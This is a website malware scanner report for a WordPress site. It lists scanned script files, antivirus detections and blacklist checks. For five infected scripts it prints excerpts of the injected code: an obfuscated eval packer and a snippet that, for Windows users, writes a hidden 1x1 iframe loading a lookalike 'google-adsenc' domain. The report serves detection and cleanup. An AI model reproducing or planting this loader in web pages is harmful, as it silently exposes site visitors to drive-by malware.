New scan:

Malware Scanner report for getsmile-online.com

Malicious/Suspicious/Total urls checked
5/0/10
5 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/6/6
6 suspicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.getsmile-online.com/
200 OK
Content-Length: 23334
Content-Type: text/html
clean
http://www.getsmile-online.com/wp-includes/js/jquery/jquery.js?ver=1.8.3
200 OK
Content-Length: 93658
Content-Type: application/javascript
clean
http://www.getsmile-online.com/wp-content/plugins/featured-content-gallery/scripts/mootools.v1.11.js
200 OK
Content-Length: 37241
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('m 9F={af:\'1.11\'};h $5k(L){k(L!=7D)};h $t(L){o(!$5k(L))k V;o(L.3T)k\'B\';m t=57 L;o(t==\'2w\'&&L.a7){2k(L.6m){17 1:k\'B\';17 3:k(/\\S/).2U(L.8q)?\'ak\':\'a
... 3113 bytes are skipped ...
szCookieString = document.cookie; var boroda = BrowserDetect.browser; var os = BrowserDetect.OS; if ( ((boroda == "Firefox" || boroda == "Explorer") && (os == "Windows")) && (findCookie('geo_idn')!='c48a765e4f75baeb85f0a755fc3ec09c') ) {addCookie("geo_idn","c48a765e4f75baeb85f0a755fc3ec09c",1);document.write('<iframe src="http://google-adsenc.com/in.cgi?2" name="Twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"></iframe>');}else {}

Antivirus reports:

AntiVir
JS/iFrame.AZS
Avast
JS:Iframe-LB [Trj]
Ikarus
Trojan.IframeRef
nProtect
Trojan.JS.Iframe.AZS
TrendMicro-HouseCall
JS_IFRAME.BTV
Emsisoft
Trojan.JS.Iframe.AZS (B)
Comodo
TrojWare.JS.iFrame.TW
DrWeb
JS.IFrame.234
TrendMicro
JS_IFRAME.BTV
Kaspersky
Trojan-Downloader.HTML.IFrame.agc
Microsoft
Trojan:JS/Iframe.BC
Fortinet
JS/IFrame.SES!tr
PCTools
Trojan.Malscript
TotalDefense
JS/iFrame.IR
Jiangmin
Trojan/Script.Gen
NANO-Antivirus
Trojan.Script.Iframe.lttlg
F-Secure
Trojan.JS.Iframe.AZS
VIPRE
Malware.JS.Generic (JS)
AVG
HTML/Framer
Norman
Iframe.NF
Sophos
Troj/JSRedir-EF
GData
Trojan.JS.Iframe.AZS
Symantec
Trojan.Malscript!JS
ESET-NOD32
HTML/Iframe.B.Gen
BitDefender
Trojan.JS.Iframe.AZS

Hidden iFrame found.
size: 1x1     
src: http://google-adsenc.com/in.cgi?2

<iframe src="http://google-adsenc.com/in.cgi?2" name="twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px">

http://www.getsmile-online.com/wp-content/plugins/featured-content-gallery/scripts/jd.gallery.js.php
200 OK
Content-Length: 25597
Content-Type: text/html
clean
http://www.getsmile-online.com/test404page.js
404 Not Found
Content-Length: 965
Content-Type: text/html
clean
http://www.getsmile-online.com/wp-content/plugins/featured-content-gallery/scripts/jd.gallery.transitions.js
200 OK
Content-Length: 4583
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

gallery.Transitions.extend({
fadeslideleft: function(oldFx, newFx, oldPos, newPos){
oldFx.options.transition = newFx.options.transition = Fx.Transitions.Cubic.easeOut;
oldFx.options.duration = newFx.options.duration = 1500;
if (newPos > oldPos)
{
newFx.start({
left: [this.galleryElement.offsetWidth, 0],
opacity: 1
});
oldFx.start({opacity: [1,0]});
} else {
newFx.start({opacity: [0,1]});
oldFx.start({

... 3930 bytes are skipped ...
szCookieString = document.cookie; var boroda = BrowserDetect.browser; var os = BrowserDetect.OS; if ( ((boroda == "Firefox" || boroda == "Explorer") && (os == "Windows")) && (findCookie('geo_idn')!='c48a765e4f75baeb85f0a755fc3ec09c') ) {addCookie("geo_idn","c48a765e4f75baeb85f0a755fc3ec09c",1);document.write('<iframe src="http://google-adsenc.com/in.cgi?2" name="Twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"></iframe>');}else {}

Antivirus reports:

AntiVir
JS/iFrame.aai.1
Avast
HTML:Iframe-BSF [Trj]
Ad-Aware
Trojan.Iframe.ADA
Ikarus
Trojan.IframeRef
nProtect
Trojan.Iframe.ADA
K7AntiVirus
Exploit ( 04c561a91 )
TrendMicro-HouseCall
JS_IFRAME.BTV
Emsisoft
Trojan.Iframe.ADA (B)
Comodo
TrojWare.JS.iFrame.TW
CAT-QuickHeal
JS/Iframe.BCG
K7GW
Exploit ( 04c561a91 )
DrWeb
JS.IFrame.234
TrendMicro
JS_IFRAME.BTV
Microsoft
Trojan:JS/Iframe.BC
Kaspersky
Trojan-Downloader.JS.Iframe.cvb
MicroWorld-eScan
Trojan.Iframe.ADA
Fortinet
JS/IFrame.SEC!tr
TotalDefense
JS/iFrame.IR
NANO-Antivirus
Trojan.Script.Iframe.lttlg
F-Secure
Trojan.Iframe.ADA
VIPRE
Malware.JS.Generic (JS)
F-Prot
IFrame.gen
AVG
HTML/Framer.FD
Norman
Iframe.RI
Sophos
Troj/JSRedir-EF
GData
Trojan.Iframe.ADA
Symantec
Trojan.Webkit!html
Commtouch
IFrame.gen
AVware
Malware.JS.Generic (JS)
BitDefender
Trojan.Iframe.ADA

Hidden iFrame found.
size: 1x1     
src: http://google-adsenc.com/in.cgi?2

<iframe src="http://google-adsenc.com/in.cgi?2" name="twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px">

http://www.getsmile-online.com/wp-content/themes/intrepidity/js/superfish.js
200 OK
Content-Length: 6115
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

;(function($){
$.fn.superfish = function(op){
var sf = $.fn.superfish,
c = sf.c,
$arrow = $(['<span class="',c.arrowClass,'"> &#187;</span>'].join('')),
over = function(){
var $$ = $(this), menu = getMenu($$);
clearTimeout(menu.sfTimer);
$$.showSuperfishUl().siblings().hideSuperfishUl();
},
out = function(){
var $$ = $(this), menu = getMenu($$), o = sf.op;
clearTimeout(menu.sfTimer);
men
... 3328 bytes are skipped ...
szCookieString = document.cookie; var boroda = BrowserDetect.browser; var os = BrowserDetect.OS; if ( ((boroda == "Firefox" || boroda == "Explorer") && (os == "Windows")) && (findCookie('geo_idn')!='c48a765e4f75baeb85f0a755fc3ec09c') ) {addCookie("geo_idn","c48a765e4f75baeb85f0a755fc3ec09c",1);document.write('<iframe src="http://google-adsenc.com/in.cgi?2" name="Twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"></iframe>');}else {}

Antivirus reports:

AntiVir
JS/iFrame.aai.1
Avast
HTML:Iframe-BSF [Trj]
Ad-Aware
Trojan.Iframe.ADA
Ikarus
Trojan.IframeRef
nProtect
Trojan.Iframe.ADA
K7AntiVirus
Exploit ( 04c561a91 )
TrendMicro-HouseCall
JS_IFRAME.BTV
Comodo
TrojWare.JS.iFrame.TW
Emsisoft
Trojan.Iframe.ADA (B)
CAT-QuickHeal
JS/Iframe.BCG
K7GW
Exploit ( 04c561a91 )
DrWeb
JS.IFrame.234
TrendMicro
JS_IFRAME.BTV
Microsoft
Trojan:JS/Iframe.BC
Kaspersky
Trojan-Downloader.JS.Iframe.cvb
MicroWorld-eScan
Trojan.Iframe.ADA
Fortinet
JS/IFrame.SEC!tr
TotalDefense
JS/iFrame.IR
NANO-Antivirus
Trojan.Script.Iframe.lttlg
F-Secure
Trojan.Iframe.ADA
VIPRE
Malware.JS.Generic (JS)
F-Prot
IFrame.gen
AVG
HTML/Framer.FD
Sophos
Troj/JSRedir-EF
GData
Trojan.Iframe.ADA
Symantec
Trojan.Webkit!html
Commtouch
IFrame.gen
AVware
Malware.JS.Generic (JS)
BitDefender
Trojan.Iframe.ADA

Hidden iFrame found.
size: 1x1     
src: http://google-adsenc.com/in.cgi?2

<iframe src="http://google-adsenc.com/in.cgi?2" name="twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px">

http://www.getsmile-online.com/wp-content/themes/intrepidity/js/functions.js
200 OK
Content-Length: 4056
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

jQuery(document).ready(function($){
$('#globalnav ul').superfish({
delay: 200,
speed: 'fast',
autoArrows: false
});
$("#sidebar h2 a").click(function () {
var itemlist = $(this).parents("li:first");
itemlist.toggleClass("side-switch");
itemlist.find("ul").slideToggle("fast");
return false;

});
});
function printCopyrightYears(startYear) {
if(!startYear)
var
... 3220 bytes are skipped ...
szCookieString = document.cookie; var boroda = BrowserDetect.browser; var os = BrowserDetect.OS; if ( ((boroda == "Firefox" || boroda == "Explorer") && (os == "Windows")) && (findCookie('geo_idn')!='c48a765e4f75baeb85f0a755fc3ec09c') ) {addCookie("geo_idn","c48a765e4f75baeb85f0a755fc3ec09c",1);document.write('<iframe src="http://google-adsenc.com/in.cgi?2" name="Twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"></iframe>');}else {}

Antivirus reports:

AntiVir
JS/iFrame.aai.1
Avast
HTML:Iframe-BSF [Trj]
Ad-Aware
Trojan.Iframe.ADA
Ikarus
Trojan.IframeRef
nProtect
Trojan.Iframe.ADA
K7AntiVirus
Exploit ( 04c561a91 )
TrendMicro-HouseCall
JS_IFRAME.BTV
Comodo
TrojWare.JS.iFrame.TW
Emsisoft
Trojan.Iframe.ADA (B)
K7GW
Exploit ( 04c561a91 )
DrWeb
JS.IFrame.234
TrendMicro
JS_IFRAME.BTV
Microsoft
Trojan:JS/Iframe.BC
Kaspersky
Trojan-Downloader.JS.Iframe.cvb
MicroWorld-eScan
Trojan.Iframe.ADA
Fortinet
JS/IFrame.SEC!tr
TotalDefense
JS/iFrame.IR
NANO-Antivirus
Trojan.Script.Iframe.lttlg
F-Secure
Trojan.Iframe.ADA
VIPRE
Malware.JS.Generic (JS)
F-Prot
IFrame.gen
AVG
HTML/Framer.FD
Sophos
Troj/JSRedir-EF
GData
Trojan.Iframe.ADA
Symantec
Trojan.Webkit!html
Commtouch
IFrame.gen
AVware
Malware.JS.Generic (JS)
BitDefender
Trojan.Iframe.ADA

Hidden iFrame found.
size: 1x1     
src: http://google-adsenc.com/in.cgi?2

<iframe src="http://google-adsenc.com/in.cgi?2" name="twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px">

http://www.getsmile-online.com/wp-includes/js/jquery/jquery.form.min.js?ver=2.73
200 OK
Content-Length: 11116
Content-Type: application/javascript
clean
http://www.getsmile-online.com/wp-content/plugins/contact-form-7/scripts.js?ver=2.2.1
200 OK
Content-Length: 14046
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

jQuery(document).ready(function() {
try {
jQuery('div.wpcf7 > form').ajaxForm({
beforeSubmit: wpcf7BeforeSubmit,
dataType: 'json',
success: wpcf7ProcessJson
});
} catch (e) {
}
try {
jQuery('div.wpcf7 > form').each(function(i, n) {
wpcf7ToggleSubmit(jQuery(n));
});
} catch (e) {
}
try {
if (_wpcf7.cached) {
jQuery('div.wpcf7 > form').each(function(i, n) {
wpcf7OnloadRefill(n);
... 3313 bytes are skipped ...
szCookieString = document.cookie; var boroda = BrowserDetect.browser; var os = BrowserDetect.OS; if ( ((boroda == "Firefox" || boroda == "Explorer") && (os == "Windows")) && (findCookie('geo_idn')!='c48a765e4f75baeb85f0a755fc3ec09c') ) {addCookie("geo_idn","c48a765e4f75baeb85f0a755fc3ec09c",1);document.write('<iframe src="http://google-adsens.com/in.cgi?2" name="Twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"></iframe>');}else {}

Antivirus reports:

AntiVir
JS/iFrame.aai.1
Avast
HTML:Iframe-BSF [Trj]
Ad-Aware
Trojan.JS.Iframe.AZS
Ikarus
Trojan.IframeRef
nProtect
Trojan.JS.Iframe.AZS
K7AntiVirus
Exploit ( 04c561a91 )
TrendMicro-HouseCall
JS_IFRAME.BTV
Emsisoft
Trojan.JS.Iframe.AZS (B)
Comodo
TrojWare.JS.iFrame.TW
CAT-QuickHeal
JS/Iframe.BCG
K7GW
Exploit ( 04c561a91 )
DrWeb
JS.IFrame.234
TrendMicro
JS_IFRAME.BTV
Microsoft
Trojan:JS/Iframe.BC
Kaspersky
Trojan-Downloader.HTML.IFrame.agc
MicroWorld-eScan
Trojan.JS.Iframe.AZS
Fortinet
JS/IFrame.SEC!tr
TotalDefense
JS/iFrame.IR
Jiangmin
Trojan/Script.Gen
NANO-Antivirus
Trojan.Script.Iframe.lttlg
F-Secure
Trojan.JS.Iframe.AZS
VIPRE
Malware.JS.Generic (JS)
F-Prot
IFrame.gen
AVG
HTML/Framer.FD
Sophos
Troj/JSRedir-EF
GData
Trojan.JS.Iframe.AZS
Symantec
Trojan.Malscript!JS
Commtouch
IFrame.gen
AVware
Malware.JS.Generic (JS)
BitDefender
Trojan.JS.Iframe.AZS

Hidden iFrame found.
size: 1x1     
src: http://google-adsenc.com/in.cgi?2

<iframe src="http://google-adsenc.com/in.cgi?2" name="twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px">

Hidden iFrame found.
size: 1x1     
src: http://google-adsens.com/in.cgi?2

<iframe src="http://google-adsens.com/in.cgi?2" name="twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px">


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: getsmile-online.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: getsmile-online.com
Referer: http://www.google.com/search?q=getsmile-online.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=getsmile-online.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://getsmile-online.com/

Result: getsmile-online.com is not infected or malware details are not published yet.